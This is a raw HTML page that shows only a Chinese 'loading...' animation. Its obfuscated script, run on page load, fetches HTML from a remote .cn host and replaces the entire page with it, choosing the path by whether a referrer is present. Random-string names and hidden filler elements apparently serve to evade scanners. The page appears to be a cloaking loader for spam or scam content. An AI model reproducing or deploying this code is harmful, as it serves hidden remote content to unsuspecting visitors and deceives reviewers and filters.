<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .LSIkSLOJXd {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .LSIkSLOJXd .HlalzKt8 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .LSIkSLOJXd .content {
            line-height: 50px;
            text-align: center
        }

        .LSIkSLOJXd .img {
            width: 100%
        }

        .LSIkSLOJXd .jXt1dAs {
            text-align: center
        }

        .LSIkSLOJXd .jXt1dAs span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .LSIkSLOJXd .jXt1dAs span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .LSIkSLOJXd .jXt1dAs span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .LSIkSLOJXd .jXt1dAs span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .LSIkSLOJXd .jXt1dAs span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .LSIkSLOJXd .jXt1dAs span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .LSIkSLOJXd .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function elTOx53rt(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var zdxVpo = elTOx53rt('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ zdxVpo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ zdxVpo +".html?a=share";
		}
		
        FnOYdO=url+"#"+new Date().getTime();
        FnOYdO && function() {
            $.get(FnOYdO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >kemKG6yEK3dOS9nNbKupYpYQurDwP0rPaKq3G1m46xW0OBe8ulC0JiY58yw</h1>
<div style='display:none'>j1yyBfMUXvyLfTZK4whCm8pS08n9oKSdaka55vhZQHjl</div>
<li style='display:none' >EAUJ5qikQkwl3AnUKMNWvh</li>
<p  style='display:none'>qw9uz076Exli1dTChfh9l3fPh1LL6FSDIKyEEMDUeu1e54o1zcBCBt0cr5yfrAKpxyYXjCTJ</p>
<span style='display:none'>uPVrQBJPwqzY8pYoIi4Yy</span><div class="LSIkSLOJXd">
    <div class="HlalzKt8">
        <div class="jXt1dAs">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >EjVkrbLU6NGrfcWxy4reE9VB1t64zBHsjJWfTER1Cce9cQ5YE82ixJV</ul>
<b style='display:none' >rYY3rzePgP5PYiEWn6ASJG4UYuT0kDTnaK8wR2bU7bbljQS3bigkPGaihg0uZGg</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<h1 style='display:none' >r96rZgLBMyMykxHs0qARhyENPgQTIGkpSuiQzMIGnYQatBWD2wscj79K0dXWXEm0MMQThkBeRNt3DEjkOSnuCq</h1>
<h1 style='display:none' >r96rZgLBMyMykxHs0qARhyENPgQTIGkpSuiQzMIGnYQatBWD2wscj79K0dXWXEm0MMQThkBeRNt3DEjkOSnuCq</h1>
<ul style='display:none' >EjVkrbLU6NGrfcWxy4reE9VB1t64zBHsjJWfTER1Cce9cQ5YE82ixJV</ul></body>
</html>